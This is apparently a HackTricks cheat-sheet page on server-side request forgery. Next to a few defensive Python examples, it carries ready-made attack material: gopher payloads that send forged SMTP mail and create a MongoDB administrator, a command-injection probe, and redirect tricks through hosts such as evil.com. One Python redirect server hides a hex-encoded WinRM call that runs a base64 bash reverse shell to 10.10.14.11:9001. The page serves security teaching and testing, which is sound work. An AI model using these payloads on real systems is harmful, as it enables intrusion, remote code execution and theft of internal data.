SSRF (Server Side Request Forgery)
Tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
A Server-side Request Forgery (SSRF) vulnerability occurs when an attacker manipulates a server-side application into making HTTP requests to a domain of their choice. This vulnerability exposes the server to arbitrary external requests directed by the attacker.
Capture SSRF
The first thing you need to do is capture an SSRF interaction generated by you. To capture an HTTP or DNS interaction you can use tools such as:
- Burp Collaborator
- pingb
- canarytokens
- interactsh
- http://webhook.site
- https://github.com/teknogeek/ssrf-sheriff
- http://requestrepo.com/
- https://github.com/stolenusername/cowitness
- https://github.com/dwisiswant0/ngocok - A Burp Collaborator using ngrok
Whitelisted Domains Bypass
Usually you will find that the SSRF only works on certain whitelisted domains or URLs. The following page has a compilation of techniques to try to bypass that whitelist:
Bypass via open redirect
If the server is correctly protected you could bypass all the restrictions by exploiting an Open Redirect inside the web page. Because the web page will allow SSRF to the same domain and will probably follow redirects, you can exploit the Open Redirect to make the server access any internal resource.
Read more here: https://portswigger.net/web-security/ssrf
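As an added defensive example (not code from HackTricks or the PortSwigger article), the Python below closes the open-redirect bypass: it never lets the HTTP library follow redirects on its own, re-validates scheme and host on every hop, and refuses any URL carrying userinfo. The `do_request` callable and the `trusted.example` allowlist are assumptions; a constructed fake client plays an allowlisted site with an open redirect to an internal address.

```python
from urllib.parse import urlsplit, urljoin

ALLOWED_SCHEMES = {"http", "https"}
MAX_REDIRECTS = 5


class SsrfBlocked(Exception):
    """Raised when the initial URL or any redirect target fails validation."""


def validate_url(url, allowed_hosts):
    """Allow only http(s) URLs without userinfo whose host is exactly on the allowlist."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise SsrfBlocked(f"scheme not allowed: {parts.scheme!r}")
    # 'http://trusted.example@evil.example/' parses with hostname 'evil.example',
    # so any userinfo at all is refused rather than interpreted.
    if parts.username is not None or parts.password is not None:
        raise SsrfBlocked("userinfo in URL")
    host = (parts.hostname or "").lower()
    if host not in allowed_hosts:
        raise SsrfBlocked(f"host not allowed: {host!r}")
    return host


def fetch_checked(url, allowed_hosts, do_request, max_redirects=MAX_REDIRECTS):
    """Follow redirects by hand so every hop is validated before it is requested.

    do_request(url) returns (status, headers, body) and must not follow redirects
    itself (for python-requests that means allow_redirects=False).
    """
    hops = []
    for _ in range(max_redirects + 1):
        validate_url(url, allowed_hosts)
        hops.append(url)
        status, headers, body = do_request(url)
        location = {k.lower(): v for k, v in headers.items()}.get("location")
        if 300 <= status < 400 and location:
            url = urljoin(url, location)  # resolves relative Location values too
            continue
        return status, body, hops
    raise SsrfBlocked("too many redirects")


# Constructed stand-in for the HTTP client: the allowlisted site has an open
# redirect at /go?next=..., and the internal address would leak if ever reached.
def fake_request(url):
    parts = urlsplit(url)
    if parts.hostname == "trusted.example" and parts.path == "/go":
        return 302, {"Location": parts.query.split("next=", 1)[1]}, b""
    if parts.hostname == "trusted.example":
        return 200, {}, b"public page"
    if parts.hostname == "169.254.169.254":
        return 200, {}, b"SECRET metadata"
    return 404, {}, b""


def blocked_reason(url, allowed_hosts=frozenset({"trusted.example"}), do_request=fake_request):
    """Return the rejection message for url, or None when the fetch went through."""
    try:
        fetch_checked(url, allowed_hosts, do_request)
    except SsrfBlocked as exc:
        return str(exc)
    return None


def demo():
    """(body of a legitimate fetch, reason the open-redirect bypass was stopped)."""
    _, body, _ = fetch_checked("https://trusted.example/", {"trusted.example"}, fake_request)
    return body, blocked_reason("https://trusted.example/go?next=http://169.254.169.254/")
```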
Protocols
- file://
  - The URL scheme file:// is referenced, pointing directly to /etc/passwd: file:///etc/passwd
- dict://
  - The DICT URL scheme is described as being used for accessing definitions or word lists via the DICT protocol. The example illustrates a constructed URL targeting a specific word, database, and entry number, as well as a PHP script that could be misused to connect to a DICT server using attacker-provided credentials: dict://<generic_user>;<auth>@<generic_host>:<port>/d:<word>:<database>:<n>
- SFTP://
  - Identified as a protocol for secure file transfer over secure shell; an example shows how a PHP script could be exploited to connect to a malicious SFTP server: url=sftp://generic.com:11111/
- TFTP://
  - Trivial File Transfer Protocol, working over UDP, is mentioned with an example of a PHP script designed to send a request to a TFTP server. A TFTP request is made to 'generic.com' on port '12346' for the file 'TESTUDPPACKET': ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET
- LDAP://
  - This segment covers the Lightweight Directory Access Protocol, emphasizing its use for managing and accessing distributed directory information services over IP networks. Interact with an LDAP server on localhost: '%0astats%0aquit' via ssrf.php?url=ldap://localhost:11211/%0astats%0aquit.
- SMTP
  - A method is described for exploiting SSRF vulnerabilities to interact with SMTP services on localhost, including steps to reveal internal domain names and further investigative actions based on that information.
    From https://twitter.com/har1sec/status/1182255952055164929
    1. connect with SSRF on smtp localhost:25
    2. from the first line get the internal domain name 220 http://blabla.internaldomain.com ESMTP Sendmail
    3. search http://internaldomain.com on github, find subdomains
    4. connect
- Curl URL globbing - WAF bypass
  - If the SSRF is executed by curl, curl has a feature called URL globbing that can help to bypass WAFs. For example, in this writeup you can find this example of a path traversal via the file protocol:
    file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}
- Gopher://
  - The Gopher protocol's capability to specify the IP, port, and bytes for server communication is discussed, along with tools like Gopherus and remote-method-guesser for crafting payloads. Two distinct usages are illustrated:
Gopher://
Using this protocol you can specify the IP, port and bytes you want the server to send. Then, you can basically exploit an SSRF to communicate with any TCP server (but you need to know how to talk to the service first).
Fortunately, you can use Gopherus to create payloads for several services. Additionally, remote-method-guesser can be used to create gopher payloads for Java RMI services.
Gopher smtp
```
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
```
will make a request like
```
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: AH AH AH

You didn't say the magic word !


.
QUIT
```
Gopher HTTP
```
#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body
```
Gopher SMTP - Back connect to 1337
```php
<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>
```
Now query it.
https://example.com/?q=http://evil.com/redirect.php.
Gopher MongoDB – Create a user with username=admin, password=admin123, and permission=administrator
```bash
# Check: https://brycec.me/posts/dicectf_2023_challenges#unfinished
curl 'gopher://0.0.0.0:27017/_%a0%00%00%00%00%00%00%00%00%00%00%00%dd%07%00%00%00%00%00%00%00%8b%00%00%00%02insert%00%06%00%00%00users%00%02$db%00%0a%00%00%00percetron%00%04documents%00V%00%00%00%030%00N%00%00%00%02username%00%06%00%00%00admin%00%02password%00%09%00%00%00admin123%00%02permission%00%0e%00%00%00administrator%00%00%00%00'
```
SSRF via Referrer header & Others
Analytics software on servers often logs the Referrer header to track incoming links, a practice that inadvertently exposes applications to Server-Side Request Forgery (SSRF) vulnerabilities.
This is because such software may visit external URLs mentioned in the Referrer header to analyze the content of referring sites. To uncover these vulnerabilities, the Burp Suite plugin "Collaborator Everywhere" is advised, leveraging the way analytics tools process the Referer header to identify potential SSRF attack surfaces.
SSRF via SNI data from certificate
A misconfiguration that could enable a connection to any backend through a simple setup is illustrated with an example Nginx configuration:
```nginx
stream {
    server {
        listen 443;
        resolver 127.0.0.11;
        proxy_pass $ssl_preread_server_name:443;
        ssl_preread on;
    }
}
```
In this configuration, the value from the Server Name Indication (SNI) field is directly used as the backend's address. This setup exposes a Server-Side Request Forgery (SSRF) vulnerability, which can be exploited by merely specifying the desired IP address or domain name in the SNI field. An exploitation example to force a connection to an arbitrary backend, such as internal.host.com, using the openssl command is shown below:
```bash
openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf
```
SSRF via TLS AIA CA Issuers (Java mTLS)
Some TLS stacks will automatically download missing intermediate CAs using the Authority Information Access (AIA) → CA Issuers URI inside the peer certificate. In Java, enabling -Dcom.sun.security.enableAIAcaIssuers=true while running an mTLS service makes the server follow attacker-controlled URIs from the client certificate during the handshake, before any HTTP logic runs.
- Requirements: mTLS enabled, Java AIA fetching enabled, attacker can present a client cert with a crafted AIA CA Issuers URI.
- Triggering SSRF (Java 21 example):
```bash
java -Djava.security.debug=certpath \
  -Dcom.sun.security.enableAIAcaIssuers=true \
  -Dhttp.agent="AIA CA Issuers PoC" -jar server.jar
# Attacker cert AIA: http://localhost:8080
nc -l 8080 -k   # observe the outbound fetch
curl https://mtls-server:8444 --key client-aia-key.pem --cert client-aia-localhost-cert.pem --cacert ca-cert.pem
```
The Java certpath debug output shows CertStore URI:http://localhost:8080, and nc captures an HTTP request whose User-Agent is controllable through -Dhttp.agent, confirming SSRF during certificate validation.
- DoS via file://: setting the AIA CA Issuers to file:///dev/urandom on Unix-like hosts makes Java treat it as a CertStore and read unbounded random bytes, keeping one CPU core busy and blocking subsequent connections even after the client disconnects.
Wget file upload
SSRF with Command Injection
It might be worth trying a payload like: url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`
PDF Rendering
If the web page is automatically creating a PDF with some information you have provided, you can insert some JS that will be executed by the PDF creator itself (the server) while creating the PDF and you will be able to abuse an SSRF. Find more information here.
From SSRF to DoS
Create several sessions and try to download heavy files exploiting the SSRF from those sessions.
SSRF PHP Functions
Check the following page for vulnerable PHP functions and even Wordpress functions:
SSRF Redirect to Gopher
For some exploitations you might need to send a redirect response (probably to use a different protocol like gopher). Here you have different Python codes to respond with a redirect:
```python
# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl


class MainHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        print("GET")
        self.send_response(301)
        self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
        self.end_headers()


httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
# ssl.wrap_socket() was removed in Python 3.12; wrap the listening socket with an SSLContext instead
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile="server.pem")
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()
```
```python
from flask import Flask, redirect
from urllib.parse import quote

app = Flask(__name__)


@app.route('/')
def root():
    return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)


if __name__ == "__main__":
    app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
```
Misconfigured proxies to SSRF
Tricks from this post.
Flask
Flask proxy vulnerable code
```python
from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com'


@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
    # Vulnerable: the caller-controlled path is concatenated straight onto SITE_NAME
    return get(f'{SITE_NAME}{path}').content


if __name__ == "__main__":
    app.run(threaded=False)
```
Flask allows using **`@`** as the initial character, which allows making the **initial host name become the username** and inject a new one. Attack request:
```http
GET @evildomain.com/ HTTP/1.1
Host: target.com
Connection: close
```
Spring Boot
Vulnerable code:
It was discovered that it's possible to start the path of the request with the character `;`, which then allows using `@` and injecting a new host to access. Attack request:
```http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
```
PHP Built-in Web Server
Vulnerable PHP code
```php
<?php
// $site is the upstream base URL and $current_uri the incoming request path;
// these two definitions are assumed, the original snippet starts below them
$site = 'https://google.com';
$current_uri = $_SERVER['REQUEST_URI'];

$proxy_site = $site.$current_uri;
var_dump($proxy_site);
echo "\n\n";
$response = file_get_contents($proxy_site);
var_dump($response);
?>
```
PHP allows the use of **the character `*` before a slash in the URL path**; however, it has other limitations, such as that it can only be used for the root pathname `/` and that dots `.` aren't allowed before the first slash, so it's necessary to use a hex-encoded IP address without dots, for example:
```http
GET *@0xa9fea9fe/ HTTP/1.1
Host: target.com
Connection: close
```
DNS Rebinding CORS/SOP bypass
If you are having problems exfiltrating content from a local IP because of CORS/SOP, DNS Rebinding can be used to bypass that limitation:
CORS - Misconfigurations & Bypass
Automated DNS Rebinding
Singularity of Origin is a tool to perform DNS rebinding attacks. It includes the necessary components to rebind the IP address of the attack server DNS name to the target machine's IP address and to serve attack payloads to exploit vulnerable software on the target machine.
Check out also the publicly running server at http://rebind.it/singularity.html
DNS Rebinding + TLS Session ID/Session ticket
Requirements:
- SSRF
- Outbound TLS sessions
- Stuff on local ports
Attack:
- Ask the user/bot to access a domain controlled by the attacker
- The DNS TTL is 0 sec (so the victim will look up the domain's IP again soon)
- A TLS connection is created between the victim and the attacker's domain. The attacker introduces the payload inside the Session ID or Session Ticket.
- The domain starts an infinite loop of redirects against itself. The goal is to make the user/bot keep accessing the domain until it performs another DNS request for the domain.
- The DNS request now answers with a private IP address (127.0.0.1, for example)
- The user/bot will try to re-establish the TLS connection and, to do so, will send the Session ID/Ticket ID (where the attacker's payload was stored). So congratulations, you managed to make the user/bot attack itself.
Note that during this attack, if you want to attack localhost:11211 (memcache) you need to make the victim establish the initial connection with www.attacker.com:11211 (the port must always be the same).
To perform this attack you can use the tool: https://github.com/jmdx/TLS-poison/
For more information take a look at the talk where this attack is explained: https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference
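An added Python example (not from the talk or from TLS-poison) of the defensive counterpart to rebinding: resolve the name once, reject every answer in loopback, private or link-local space, and connect to that pinned address instead of letting the client re-resolve later. The resolver is injected so a constructed rebinding sequence (public answer first, 127.0.0.1 on the next lookup) can be replayed offline; `socket.getaddrinfo` is the real resolver and all host and address values are made up.

```python
import ipaddress
import socket


class SsrfBlocked(Exception):
    """Raised when a hostname resolves to an address the fetcher must not contact."""


def is_forbidden(ip):
    """Loopback, private, link-local (incl. 169.254.169.254), multicast, reserved or unspecified."""
    a = ipaddress.ip_address(ip)
    return (a.is_loopback or a.is_private or a.is_link_local
            or a.is_multicast or a.is_reserved or a.is_unspecified)


def system_resolver(host):
    """Real resolver: every address the OS returns for host (not used in the offline demo)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def pin_address(host, resolver=system_resolver):
    """Resolve once, vet every answer, and return the one address all later connections use.

    The caller must then connect to this IP (sending the original name in the Host
    header / SNI) instead of handing the hostname to a client that re-resolves it.
    """
    answers = resolver(host)
    if not answers:
        raise SsrfBlocked(f"{host}: no address")
    bad = [ip for ip in answers if is_forbidden(ip)]
    if bad:  # one forbidden answer is enough to refuse; do not just pick another
        raise SsrfBlocked(f"{host} resolves to forbidden address {bad[0]}")
    return answers[0]


class RebindingResolver:
    """Constructed attacker-controlled DNS: public address on the first lookup, loopback afterwards."""

    def __init__(self):
        self.calls = 0

    def __call__(self, host):
        self.calls += 1
        return ["93.184.216.34"] if self.calls == 1 else ["127.0.0.1"]


def second_connection_target(pin):
    """Address a follow-up connection goes to with (pin=True) and without IP pinning."""
    resolver = RebindingResolver()
    vetted = pin_address("www.attacker.example", resolver)  # first lookup passes: 93.184.216.34
    if pin:
        return vetted                              # reuse the vetted address
    return resolver("www.attacker.example")[0]     # a re-resolving client now gets 127.0.0.1
```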
Blind SSRF
The difference between a blind SSRF and a non-blind one is that in the blind case you cannot see the response of the SSRF request. It is therefore harder to exploit, because you will only be able to exploit well-known vulnerabilities.
Time based SSRF
By checking the time of the responses from the server it might be possible to know whether a resource exists or not (accessing an existing resource may take longer than accessing a non-existent one).
From blind to full abusing status codes
According to the blog post, some blind SSRFs can happen because even if the target URL returns a 200 status code (like AWS metadata), the data isn't formatted correctly and therefore the app may refuse to display it.
However, it was found that sending redirect responses from 305 to 309 in the SSRF could make the application follow those redirects while entering an error mode that no longer checks the data format and just prints it.
The Python server used to exploit this is the following:
```python
from flask import Flask, redirect, request

app = Flask(__name__)
# Final hop of the chain; the write-up targets the AWS metadata address (exact path not given on the page)
METADATA_URL = "http://169.254.169.254/"


@app.route("/redir")
def redir():
    count = int(request.args.get("count", 0)) + 1
    # Pump out 305, 306, 307, 308, 309, 310 ...
    weird_status = 301 + count
    if count >= 10:  # after 5 "weird" codes
        return redirect(METADATA_URL, 302)
    return redirect(f"/redir?count={count}", weird_status)


@app.route("/start")
def start():
    return redirect("/redir", 302)
```
Steps:
- The first 302 makes the app start following.
- Then it receives 305 → 306 → 307 → 308 → 309 → 310.
- After the 5th weird code the PoC finally returns 302 → 169.254.169.254 → 200 OK.
What happens inside the target:
- libcurl itself follows 305-310; it just treats any unknown 3xx code as "follow".
- After N weird redirects (≥ 5 here) the application wrapper itself decides "something is off" and switches into an error mode intended for debugging.
- In that mode it dumps the whole redirect chain plus the final body back to the external caller.
- Result: the attacker sees every header + the metadata JSON, mission accomplished.
Note that this is interesting to leak status codes that you couldn’t leak before (like a 200). However, if somehow you could also select the status code of the response (imagine that you can decide that the AWS metadata responds with a 500 status code), there might be some status codes that directly leak the content of the response.
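From the defender's side the chain above leaves a clear trace in outbound-fetcher or egress-proxy logs: a burst of non-standard 3xx codes that ends at a metadata address. The following added Python (not from the write-up) parses a few constructed log lines in an assumed `timestamp job url status [location]` format and flags such chains.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlsplit

STANDARD_REDIRECTS = {301, 302, 303, 307, 308}
# Assumed log format: "<timestamp> <job-id> <requested-url> <status> [<location-header>]"
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d{3})(?: (\S+))?$")

# Constructed fetcher log: job-17 is the chain from the write-up, job-18 a normal CDN hop.
SAMPLE_LOG = """\
2024-05-01T12:00:00Z job-17 http://attacker.example/start 302 /redir
2024-05-01T12:00:00Z job-17 http://attacker.example/redir 305 /redir?count=1
2024-05-01T12:00:00Z job-17 http://attacker.example/redir?count=1 306 /redir?count=2
2024-05-01T12:00:01Z job-17 http://attacker.example/redir?count=2 307 /redir?count=3
2024-05-01T12:00:01Z job-17 http://attacker.example/redir?count=3 308 /redir?count=4
2024-05-01T12:00:01Z job-17 http://attacker.example/redir?count=4 309 /redir?count=5
2024-05-01T12:00:01Z job-17 http://attacker.example/redir?count=5 310 /redir?count=6
2024-05-01T12:00:02Z job-17 http://attacker.example/redir?count=6 302 http://169.254.169.254/
2024-05-01T12:00:02Z job-17 http://169.254.169.254/ 200
2024-05-01T12:00:05Z job-18 https://cdn.example/img.png 301 https://cdn.example/v2/img.png
2024-05-01T12:00:05Z job-18 https://cdn.example/v2/img.png 200
"""


def parse_log(lines):
    """Yield (job, url, status, location) for every line matching the assumed format."""
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            _ts, job, url, status, location = m.groups()
            yield job, url, int(status), location


def is_internal(host):
    """True for loopback, private and link-local address literals (names are not resolved here)."""
    try:
        a = ipaddress.ip_address(host)
    except ValueError:
        return False
    return a.is_loopback or a.is_private or a.is_link_local


def find_suspicious_chains(lines, weird_threshold=3):
    """Return [(job, [reasons])] for jobs whose redirect chain looks like the attack above."""
    chains = defaultdict(list)
    for job, url, status, _location in parse_log(lines):
        chains[job].append((url, status))
    findings = []
    for job, hops in chains.items():
        reasons = []
        weird = [s for _, s in hops if 300 <= s < 400 and s not in STANDARD_REDIRECTS]
        if len(weird) >= weird_threshold:
            reasons.append(f"{len(weird)} non-standard 3xx codes: {weird}")
        final_host = urlsplit(hops[-1][0]).hostname
        if is_internal(final_host):
            reasons.append(f"chain ends at internal address {final_host}")
        if reasons:
            findings.append((job, reasons))
    return findings
```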
HTML-to-PDF renderers as blind SSRF gadgets
Libraries such as TCPDF (and wrappers like spipu/html2pdf) will automatically fetch any URLs present in attacker-controlled HTML while rendering a PDF. Each <img> or <link rel="stylesheet"> attribute is resolved server-side via cURL, getimagesize(), or file_get_contents(), so you can drive the PDF worker to probe internal hosts even though no HTTP response is reflected to you.
```html
